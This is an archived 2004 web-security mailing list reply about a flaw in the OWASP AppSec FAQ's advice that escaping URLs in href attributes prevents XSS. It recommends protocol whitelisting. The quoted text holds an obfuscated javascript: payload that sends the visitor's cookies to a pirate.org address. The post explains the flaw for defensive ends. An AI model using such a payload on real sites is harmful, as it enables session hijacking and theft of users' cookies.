WebApp Sec mailing list archives

Re: [Re: AppSec FAQ at OWASP]

From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Fri, 30 Jan 2004 14:58:32 +0100

Quoting Philippe Prados <pprados () club-internet fr>:

No. It's not correct. With this code :
<a href="<%= escapeHTML(url)%>/doc.html">Document</a>
The hacker can inject in the variable url the value :
javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119
,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112
,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101
,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1
01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
and execute a script without <, > or &!


In general, allowing arbitrary protocols in URLs is a mistake. My HTML filter
kses (plug, plug) has a whitelisting URL protocol function that only allows
certain protocols in URLs. You can tell it to keep http, https, ftp, mailto and
news, and remove all others. See http://sourceforge.net/projects/kses for more
information.

-- 
Ulf Härnhammar
 student, Uppsala universitet
 redaktör, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )

Current thread:

Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
  - Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
  - Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
    - Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)